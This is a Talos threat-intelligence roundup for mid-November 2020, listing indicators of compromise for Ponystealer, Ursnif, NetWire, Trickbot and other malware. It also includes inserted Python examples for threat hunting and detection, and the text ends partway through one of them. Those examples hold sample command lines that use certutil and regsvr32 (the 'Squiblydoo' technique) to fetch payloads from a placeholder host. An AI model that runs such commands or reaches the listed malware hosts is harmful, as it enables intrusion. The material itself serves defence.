Friday, November 20, 2020

Threat Roundup for November 13 to November 20


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 13 and Nov. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.
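As an added example (not part of the Talos post), here is Python that works with rows in the format of the IOC tables below: it refangs the `[.]` notation used for IPs and domains, and compiles the `<random, matching ...>` and `<...>` file-path templates into regular expressions so file-creation telemetry can be checked against them. The environment-variable expansions, the observed paths and the `hunt`/`network_indicators` helpers are constructed assumptions; the indicator rows themselves are copied from the Ponystealer and Ursnif sections.

```python
import re

# Constructed IOC rows in the roundup's own table format, "<indicator> <occurrences>",
# copied from the Ponystealer and Ursnif sections of this post.
IOC_ROWS = r"""
23[.]227[.]38[.]65 14
firearmengraving[.]com 14
%TEMP%\<random, matching '[0-9]{5,6}'>.bat 17
%APPDATA%\ds32mapi\dhcpxva2.exe 23
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 12
""".strip().splitlines()

# Assumed expansions of the environment variables the tables use (a standard
# per-user Windows profile layout); adjust to the hosts you hunt on.
ENV_PATTERNS = {
    "%TEMP%": r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp",
    "%APPDATA%": r"C:\\Users\\[^\\]+\\AppData\\Roaming",
}

RANDOM_PLACEHOLDER = re.compile(r"<random, matching '?(.+?)'?>")
OTHER_PLACEHOLDER = re.compile(r"<[^<>]+>")  # e.g. <profile ID>, <original file name>


def refang(indicator: str) -> str:
    """Turn the post's defanged notation (a[.]b) back into a live indicator."""
    return indicator.replace("[.]", ".")


def parse_rows(rows):
    """Split 'indicator count' rows; the indicator itself may contain spaces."""
    parsed = []
    for row in rows:
        indicator, _, count = row.rpartition(" ")
        parsed.append((indicator, int(count)))
    return parsed


def _is_path(indicator: str) -> bool:
    return indicator.startswith("%") or "\\" in indicator


def network_indicators(rows):
    """Refanged IPs and domains from the rows, for matching against DNS or proxy logs."""
    return {refang(ind) for ind, _ in parse_rows(rows) if not _is_path(ind)}


def _escape_env(text: str) -> str:
    """Escape literal path text, expanding a leading %VAR% to its pattern."""
    for var, pattern in ENV_PATTERNS.items():
        if text.startswith(var):
            return pattern + re.escape(text[len(var):])
    return re.escape(text)


def _literal(text: str) -> str:
    """Escape a template fragment; generic <...> placeholders match one path component."""
    out, pos = [], 0
    for m in OTHER_PLACEHOLDER.finditer(text):
        out.append(_escape_env(text[pos:m.start()]))
        out.append(r"[^\\]+")
        pos = m.end()
    out.append(_escape_env(text[pos:]))
    return "".join(out)


def template_to_regex(template: str) -> re.Pattern:
    """Compile a file-path template from the tables into a case-insensitive regex.

    '<random, matching RE>' keeps RE verbatim, except that the tables use a
    backslash inside RE as a path separator, so it is escaped to match literally.
    """
    parts, pos = [], 0
    for m in RANDOM_PLACEHOLDER.finditer(template):
        parts.append(_literal(template[pos:m.start()]))
        parts.append(m.group(1).replace("\\", "\\\\"))
        pos = m.end()
    parts.append(_literal(template[pos:]))
    return re.compile("".join(parts), re.IGNORECASE)


def hunt(rows, observed_paths):
    """Return (path, template, occurrences) for each observed path matching a path IOC."""
    templates = [(ind, n) for ind, n in parse_rows(rows) if _is_path(ind)]
    hits = []
    for path in observed_paths:
        for template, count in templates:
            if template_to_regex(template).fullmatch(path):
                hits.append((path, template, count))
    return hits


# Constructed file-creation paths as an endpoint agent would report them.
OBSERVED_PATHS = [
    r"C:\Users\alice\AppData\Local\Temp\48213.bat",
    r"C:\Users\bob\AppData\Local\Temp\11B0\88D8.bat",
    r"C:\Users\bob\AppData\Roaming\ds32mapi\dhcpxva2.exe",
    r"C:\Users\bob\AppData\Local\Temp\setup.bat",  # letters, not 5-6 digits: no hit
]

if __name__ == "__main__":
    for path, template, count in hunt(IOC_ROWS, OBSERVED_PATHS):
        print(f"{path}  <-  {template} (seen in {count} samples)")
```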

The most prevalent threats highlighted in this roundup are:

Threat Name (Type): Description
Win.Packed.Ponystealer-9793711-1 (Packed): Ponystealer is known to steal credentials from more than 100 different applications and may also install other malware such as a remote access trojan (RAT).
Win.Packed.Ursnif-9793771-1 (Packed): Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Dropper.NetWire-9791538-0 (Dropper): NetWire is a RAT that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, remote desktop, and read data from connected USB devices. NetWire is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Packed.Ruskill-9791575-1 (Packed): Ruskill, also known as Dorkbot, is a botnet client aimed at stealing credentials and facilitating distributed denial-of-service (DDoS) attacks. It spreads via removable media and through instant messaging applications.
Win.Malware.Trickbot-9791619-0 (Malware): Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Dropper.Lokibot-9791657-0 (Dropper): Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.TinyBanker-9791753-0 (Dropper): TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.Kuluoz-9791754-0 (Dropper): Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Threat Breakdown

Win.Packed.Ponystealer-9793711-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
23[.]227[.]38[.]65 14
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
firearmengraving[.]com 14
supersolar[.]jo 14
dcore[.]co[.]th 14
antonolsve[.]com 14
elearning[.]everpharma[.]com 14
mindtimeshare[.]bs 14
Files and or directories created Occurrences
%TEMP%\<random, matching '[0-9]{5,6}'>.bat 17

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Ursnif-9793771-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: appmmgmt
23
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Install
23
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 23
<HKCU>\SOFTWARE\MICROSOFT\IAM
Value Name: Server ID
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Scr
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Temp
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
12
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
12
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\\PARAMETERS\PORTKEYWORDS\DHCP
Value Name: Collection
1
Mutexes Occurrences
{<random GUID>} 15
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269} 12
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} 12
Local\{B1443895-5CF6-0B1E-EE75-506F02798413} 12
{EF12DD09-8223-F98C-0493-D63D78776AC1} 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]16[.]45[.]99 8
104[.]16[.]44[.]99 7
204[.]79[.]197[.]200 3
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
www[.]ietf[.]org 15
trdsabstraction[.]info 12
Files and or directories created Occurrences
%APPDATA%\ds32mapi 23
%APPDATA%\ds32mapi\dhcpxva2.exe 23
%TEMP%\<random, matching [A-F0-9]{3,4}> 23
%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat 23
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\prefs.js 12
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD} 12
%TEMP%\11B0\88D8.tmp 1
%TEMP%\DE32\EF19.tmp 1
%TEMP%\E66\8733.tmp 1
%TEMP%\E026\F013.tmp 1
%TEMP%\FE02\FF01.tmp 1
%TEMP%\FA98\FD4C.tmp 1
%TEMP%\7310\B988.tmp 1
%TEMP%\DD96\EECB.tmp 1
%TEMP%\FC8A\FE45.tmp 1
%TEMP%\F5B8\FAEB.tmp 1
%TEMP%\71BA\B8DD.tmp 1
%TEMP%\4472\2239.tmp 1
%TEMP%\CD0\8668.tmp 1
%TEMP%\4608\2304.tmp 1

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.NetWire-9791538-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Mutexes Occurrences
- 4
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
185[.]140[.]53[.]231 14
Files and or directories created Occurrences
\.Identifier 14
\TEMP\.Identifier 14
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\copied.vbe 14
%TEMP%\copied.exe 14
%HOMEPATH%\Start Menu\Programs\Startup\copied.vbe 4

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Packed.Ruskill-9791575-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: BCSSync
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Eoawaa
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update Installer
5
<HKCU>\SOFTWARE\UAZI SOFT
Value Name: UaziVer
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live Installer
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Windows Live
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Live
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 4
<HKCU>\SOFTWARE\UAZI SOFT 4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: TaskbarNoNotification
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: 1081297374
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: Load
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 1081297374
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: splwow64.exe
1
Mutexes Occurrences
FvLQ49I›¬{Ljj6m 5
c731200 1
Xl5jVVxcVWIx 1
1z2z3reas34534543233245x6 1
SVCHOST_MUTEX_OBJECT_RELEASED_c0009X00GOAL 1
SSLOADasdasc000900 1
-9caf4c3fMutex 1
FvLQ49I {Ljj6m 1
alFSVWJB 1
{9E3C146B-9ECE-17D5-CF30-7364D9E21D36} 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
204[.]95[.]99[.]243 5
162[.]217[.]99[.]134 5
104[.]215[.]148[.]63 2
104[.]42[.]225[.]122 2
66[.]171[.]248[.]178 1
212[.]83[.]168[.]196 1
195[.]22[.]28[.]198 1
208[.]100[.]26[.]245 1
103[.]234[.]36[.]148 1
121[.]11[.]83[.]197 1
131[.]211[.]8[.]244 1
176[.]9[.]102[.]215 1
95[.]165[.]168[.]168 1
35[.]205[.]61[.]67 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
n[.]ezjhyxxbf[.]ru 5
n[.]hmiblgoja[.]ru 5
n[.]yxntnyrap[.]ru 5
n[.]vbemnggcj[.]ru 5
n[.]yqqufklho[.]ru 5
n[.]oceardpku[.]ru 5
n[.]zhgcuntif[.]ru 5
n[.]jupoofsnc[.]ru 5
n[.]kvupdstwh[.]ru 5
n[.]aoyylwyxd[.]ru 5
n[.]spgpemwqk[.]ru 3
europe[.]pool[.]ntp[.]org 2
bot[.]whatismyipaddress[.]com 1
nutr3inomiranda1[.]com 1
nutr3inomiranda4[.]com 1
nutr3inomiranda2[.]com 1
nutr3inomiranda5[.]com 1
nutr3inomiranda3[.]com 1
api[.]wipmania[.]com 1
n[.]jntbxduhz[.]ru 1
n[.]lotys[.]ru 1
nutqauytv5a1113xyzf115zzz4[.]com 1
nutqauytva513xyzf11zzzzz0[.]com 1
nutqauytva6213xyzf112zzz1[.]com 1
nutqauytva1413xyzf114zzz3[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%APPDATA%\WindowsUpdate 9
\$RECYCLE.BIN.lnk 5
%TEMP%\c731200 5
%APPDATA%\c731200 5
\System_Volume_Information.lnk 5
\jsdrpAj.exe 5
%APPDATA%\Update\Explorer.exe 5
%APPDATA%\Update\Update.exe 5
%APPDATA%\WindowsUpdate\Updater.exe 5
E:\$RECYCLE.BIN.lnk 5
%APPDATA%\Microsoft\Windows\themes\Eoawaa.exe 5
E:\System_Volume_Information.lnk 5
E:\c731200 5
E:\jsdrpAj.exe 5
%APPDATA%\Update 5
%TEMP%\temp41.tmp 4
%APPDATA%\WindowsUpdate\Live.exe 4
%TEMP%\apiSoftCA 4
%APPDATA%\Windows Live 4
%APPDATA%\Windows Live\debug_cache_dump_2384394.dmp 4
%APPDATA%\Windows Live\pldufejsya.exe 4
%ProgramData%\msodtyzm.exe 2
%SystemRoot%\kernel32.dll 2
%APPDATA%\Microsoft\Windows\Themes\Uxoioc.exe 1
%SystemRoot%\Tasks\alFSVWJB.job 1
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Malware.Trickbot-9791619-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
Mutexes Occurrences
GLOBAL\{<random GUID>} 35
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
194[.]5[.]250[.]178/31 5
204[.]79[.]197[.]200 3
85[.]143[.]218[.]249 1
5[.]182[.]210[.]226 1
200[.]127[.]121[.]99 1
185[.]14[.]31[.]72 1
212[.]80[.]217[.]243 1
Files and or directories created Occurrences
%APPDATA%\MonoLibrary 30
%System32%\Tasks\Mono Library 30
%APPDATA%\MONOLIBRARY\<original file name>.exe 28
%APPDATA%\MonoLibrary\data 9
%APPDATA%\MonoLibrary\settings.ini 8
%APPDATA%\FileExt 5
%System32%\Tasks\Shell File Extensions 5
%APPDATA%\FILEEXT\<original file name>.exe 5
%APPDATA%\FileExt\settings.ini 3
%APPDATA%\MonoLibrary\6f80025bde0da96f33bf751168ca7d67.exe 1
%APPDATA%\MonoLibrary\f242faa29b06fca60de6637aefc2b457.exe 1

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.Lokibot-9791657-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
1
Mutexes Occurrences
3749282D282E1E80C56CAE5A 7
9DAA44F7C7955D46445DC99B 6
Global\cefa5160-24d7-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
103[.]83[.]81[.]68 3
185[.]180[.]198[.]135 2
185[.]209[.]1[.]127 2
104[.]16[.]155[.]36 1
204[.]79[.]197[.]200 1
103[.]129[.]98[.]58 1
46[.]17[.]98[.]105 1
188[.]165[.]205[.]198 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
legalpath[.]in 2
paciflxinc[.]com 2
whatismyipaddress[.]com 1
airmanselectiontest[.]com 1
venitronics[.]com 1
www[.]webserverboxservices[.]com 1
mail[.]ilkimegitim[.]com 1
webserverboxservices[.]com 1
Files and or directories created Occurrences
%APPDATA%\D282E1 7
%APPDATA%\D282E1\1E80C5.lck 7
%APPDATA%\7C7955\5D4644.lck 6
%APPDATA%\7C7955\5D4644.exe (copy) 5
\Sys.exe 1
\autorun.inf 1
E:\autorun.inf 1
%APPDATA%\pid.txt 1
%APPDATA%\pidloc.txt 1
%TEMP%\holdermail.txt 1
%TEMP%\holderwb.txt 1
E:\Sys.exe 1
%APPDATA%\WindowsUpdate.exe 1
%APPDATA%\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg 1
%TEMP%\WAXDB19.tmp 1
%TEMP%\WAX19A3.tmp 1

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.TinyBanker-9791753-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: EEFEB657
15
Mutexes Occurrences
EEFEB657 15
4A60888F 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
216[.]218[.]185[.]162 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ivrvfntohghc[.]com 1
oreganogf[.]su 1
llenngpoefxy[.]com 1
ifkmqtsfiiqr[.]com 1
ihxghiyqmhim[.]com 1
jnfeqhkpihgc[.]com 1
fjedebccuuhc[.]com 1
Files and or directories created Occurrences
%HOMEPATH%\AppData\LocalLow\EEFEB657 15
%APPDATA%\EEFEB657 15
%APPDATA%\EEFEB657\bin.exe 15
%APPDATA%\4A60888F\bin.exe 1

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.Kuluoz-9791754-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\LJHTFCNR
Value Name: dhwucukt
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fqgfwbsp
3
<HKCU>\SOFTWARE\RDIBFLGD
Value Name: tptpmlvu
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hqlpxgip
2
<HKCU>\SOFTWARE\RFPNSTHW
Value Name: mrvrrvei
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: njcelksc
1
<HKCU>\SOFTWARE\SABHCWOL
Value Name: ikvpbrea
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: efukhihs
1
<HKCU>\SOFTWARE\KNKMASGL
Value Name: unvndjfo
1
<HKCU>\SOFTWARE\EKTCABSE
Value Name: wxnvcnos
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lujqtbin
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: tuadafle
1
<HKCU>\SOFTWARE\WMXHUOBW
Value Name: pwqaoveb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: rfvjtqro
1
<HKCU>\SOFTWARE\XJJDLCWW
Value Name: xnffcgsq
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: qberplug
1
<HKCU>\SOFTWARE\RTFOELRR
Value Name: jwqogfou
1
<HKCU>\SOFTWARE\EFCGURQI
Value Name: bwxpjjan
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: exlkscqa
1
<HKCU>\SOFTWARE\JOQPBVDH
Value Name: agqfeehb
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ditdkksa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: hqxdfeff
1
<HKCU>\SOFTWARE\WALMTWQU
Value Name: ktkftafd
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: olgicsmm
1
Mutexes Occurrences
aaAdministrator 26
abAdministrator 26
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
130[.]60[.]202[.]71 20
5[.]249[.]139[.]132 20
69[.]64[.]36[.]244 18
16[.]156[.]201[.]237 16
5[.]175[.]166[.]35 16
85[.]12[.]29[.]251 15
110[.]77[.]220[.]66 14
198[.]57[.]165[.]46 11
Files and or directories created Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 26

File Hashes

*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Dealply adware detected - (6479)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (2465)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process but, before the child runs, clears its memory and fills it with the unpacked contents from the parent instead.
CVE-2019-0708 detected - (2213)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Smoke Loader detected - (1739)
Smoke Loader has been detected. Smokeloader is used mainly to execute other malicious software, like ransomware or cryptocurrency miners. Its initial infection vector is usually an email with a malicious Microsoft Word document, or delivery through an exploit kit. Smokeloader uses various plugins designed to steal data from its victims, particularly credentials stored on the system or transferred over HTTP, HTTPS, FTP, SMTP, POP3 or IMAP.
Certutil.exe is downloading a file - (1073)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
Crystalbit-Apple DLL double hijack detected - (1013)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Installcore adware detected - (779)
InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Kovter injection detected - (617)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Excessively long PowerShell command detected - (513)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Squiblydoo application whitelist bypass attempt detected - (321)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
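As an added example (not Talos's detection logic), the following Python applies three of the alert conditions above (certutil downloading a file, the Squiblydoo regsvr32 pattern, and an excessively long PowerShell command line) to constructed process-creation events and tallies them the way the counts above are reported. The event format, the length threshold and the `example.invalid` host are assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """One process-creation event: image path plus the full command line."""
    image: str
    command_line: str


# Constructed process-creation events; "example.invalid" is a placeholder host, not an IOC.
EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://example.invalid/a.dat C:\Users\Public\a.dat"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -dump C:\Users\alice\cert.cer"),  # benign certificate use
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s C:\Program Files\Vendor\tool.dll"),  # ordinary DLL registration
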